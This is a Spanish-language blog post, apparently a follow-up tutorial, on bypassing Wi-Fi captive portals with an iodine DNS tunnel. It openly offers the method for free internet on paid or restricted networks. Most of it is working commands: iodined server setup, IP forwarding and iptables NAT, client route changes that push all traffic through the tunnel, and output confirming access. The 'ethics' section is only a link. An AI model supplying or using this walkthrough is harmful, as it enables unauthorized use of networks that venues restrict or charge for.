En vista que el anterior post se trataba de técnicas de evasión de portales cautivos y ha sido el capitulo 1, buscando no encontré el capitulo 2 por el mismo autor, lastimosamente al parecer actualmente se encuentra inactivo.
Debo reconocer que tenia muy buenos aportes y en su tiempo siempre leía sus aportes. Como es claro no podemos dejar el tema tirado así que vamos a seguir con una técnica mas "reciente" para saltar los portales cautivos y también sirve para dar Internet gratis en pc y móviles.
_______________________________________________________________________________
![]() |
En ocasiones, y cada vez más, encontramos redes Wi-Fi públicas y abiertas (sin codificación de datos) que requieren autenticación. Cuando te conectas y accedes a cualquier dirección Web, salta un portal cautivo donde tienes que introducir un login, controlan el tráfico HTTP. Algunas están restringidas a cierto público cerrado, como estudiantes de una universidad o empleados de una empresa. Y otras son de pago, del estilo: envía un SMS y te dejamos navegar durante 30 minutos. ¿Existe alguna manera de vulnerar dicha restricción? La respuesta es ¡si!, la gran mayoría de esas redes tienen un pequeño fallo de seguridad que seguidamente explicamos como explotar.
|
La puerta trasea
- 1. El cliente asocia con el AP, y obtiene una configuración de red
- 2. El cliente hace una petición DNS, y le es resuelta (por ejemplo google.com)
- 3. Cuando el cliente intenta acceder a la IP de google.com, el AP (normalmente asociado a un servidor RADIUS), le deniega el acceso y lo redirecciona al portal cautivo, donde deberá introducir su login.
- 4. Si el login es correcto, el AP deja que navege libremente. Sino, a cada petición redireccionará al portal.
Explotación
IOdine
El servidor
foo.com -> 77.44.33.22
tunel.foo.com NS foo.com
Hay que tener en cuenta que el servidor no debería ser quien resuelva la DNS foo.com, ya que no podriamos tener iodine escuchando en el puerto UDP 53. O si no nos importa que la resolución de nuestro dominio foo.com quede "inaccesible", podemos utilizar el mismo dominio.
aptitude install iodine
Procedimiento
iodined -f 10.0.0.1 tunel.foo.com echo 1 > /proc/sys/net/ipv4/ip_forward iptables -A POSTROUTING -t nat -s 10.0.0.0/24 -o eth0 -j MASQUERADE
netstat -anup
El cliente
Destino Pasarela Genmask Indic Métric Ref Uso Int 10.182.0.0 0.0.0.0 255.254.0.0 U 0 0 0 ath0 0.0.0.0 10.182.1.1 0.0.0.0 UG 0 0 0 ath0
Procedimiento
route add -host 77.44.33.22 gw 10.182.1.1 route add -host DNS1 gw 10.182.1.1 route add -host DNS2 gw 10.182.1.1 route del default gw 10.182.1.1
Ahora mismo, mediante el AP sólo podemos comunicarnos con los 2 servidores DNS, y nuestro server.
Destino Pasarela Genmask Indic Métric Ref Uso Int DNS1 10.182.1.1 255.255.255.255 UGH 0 0 0 ath0 77.44.33.22 10.182.1.1 255.255.255.255 UGH 0 0 0 ath0 DNS2 10.182.1.1 255.255.255.255 UGH 0 0 0 ath0 10.182.0.0 0.0.0.0 255.254.0.0 U 0 0 0 ath0
iodine -f 77.44.33.22 tunel.foo.com
ifconfig dns0 ... Direc. inet:10.0.0.3 P-t-P:10.0.0.3 Másc:255.255.255.0 ...
route add default gw 10.0.0.1
DNS1 10.182.1.1 255.255.255.255 UGH 0 0 0 ath0 77.44.33.22 10.182.1.1 255.255.255.255 UGH 0 0 0 ath0 DNS2 10.182.1.1 255.255.255.255 UGH 0 0 0 ath0 10.182.0.0 0.0.0.0 255.254.0.0 U 0 0 0 ath0 10.0.0.0 0.0.0.0 255.255.255.0 U 0 0 0 dns0 0.0.0.0 10.0.0.1 0.0.0.0 UG 0 0 0 dns0
La interfaz dns0 para el resto de peticionies, incluidas las de internet.
Un esquema de como han quedado las conexiones sería este:

root@tr4v313r:~# ping google.com PING google.com (209.85.227.147) 56(84) bytes of data. 64 bytes from wy-in-f147.1e100.net (209.85.227.147): icmp_seq=1 ttl=56 time=865 ms 64 bytes from wy-in-f147.1e100.net (209.85.227.147): icmp_seq=2 ttl=56 time=250 ms 64 bytes from wy-in-f147.1e100.net (209.85.227.147): icmp_seq=3 ttl=56 time=1047 ms 64 bytes from wy-in-f147.1e100.net (209.85.227.147): icmp_seq=4 ttl=56 time=262 ms
405 Kbit/s bajada 41 Kbit/s subida
Ética
http://dabax.net/tunel_dns
Links de interés:
http://dabax.net/tunel_dns
http://www.securitybydefault.com/2013/03/sobre-wifi-robar-y-los-portales-cautivos.html
http://www.securitybydefault.com/2010/01/tunelizando-dns-otra-opcion-con-iodine.html
http://c1b3rh4ck.blogspot.com/2011/10/portal-cautivo-comcel-3g-1-de-2.html
http://foro.hackhispano.com/showthread.php?35768-iodine-tunel-DNS-para-saltarnos-un-portal-cautivo
http://foro.hackhispano.com/showthread.php?35763-IoDine-t%FAnel-DNS-para-saltarse-un-portal-cautivo